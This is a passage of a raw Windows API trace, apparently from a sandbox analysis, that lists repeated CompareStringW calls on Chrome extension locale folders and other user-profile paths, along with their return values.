lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\", cchCount2=130) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\", cchCount2=130) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\", cchCount2=130) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\", cchCount2=130) returned 3 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\", cchCount2=130) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\", cchCount2=130) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\", cchCount2=130) returned 3 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\", cchCount2=130) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\", cchCount2=130) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\", cchCount2=134) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\", cchCount2=134) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\", cchCount2=134) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\", cchCount2=134) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\", cchCount2=134) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\", cchCount2=130) returned 1 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\", cchCount2=130) returned 3 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\", cchCount2=130) returned 3 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\", cchCount2=130) returned 3 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount2=86) returned 3 [0283.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount2=86) returned 3 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount2=86) returned 3 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount1=97, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount2=86) returned 3 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\", cchCount2=130) returned 3 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\", cchCount2=130) returned 3 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount1=97, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\", cchCount2=130) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\", cchCount2=130) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\", cchCount2=130) returned 3 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\", cchCount2=137) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\", cchCount2=137) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\", cchCount2=137) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\", cchCount2=137) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\", cchCount2=137) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\", cchCount2=130) returned 3 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\", cchCount2=130) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\", cchCount2=130) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\", cchCount2=130) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\", cchCount2=130) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\", cchCount2=133) returned 3 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\", cchCount2=133) returned 3 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\", cchCount2=133) returned 3 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\", cchCount2=130) returned 3 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\", cchCount2=130) returned 3 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\", cchCount2=130) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\", cchCount2=130) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\", cchCount2=130) returned 3 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\", cchCount2=133) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\", cchCount2=133) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\", cchCount2=133) returned 3 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\", cchCount2=133) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\", cchCount2=133) returned 1 [0283.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\", cchCount2=130) returned 1 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\", cchCount2=130) returned 3 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\", cchCount2=130) returned 3 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\", cchCount2=130) returned 1 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\", cchCount2=130) returned 3 [0283.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 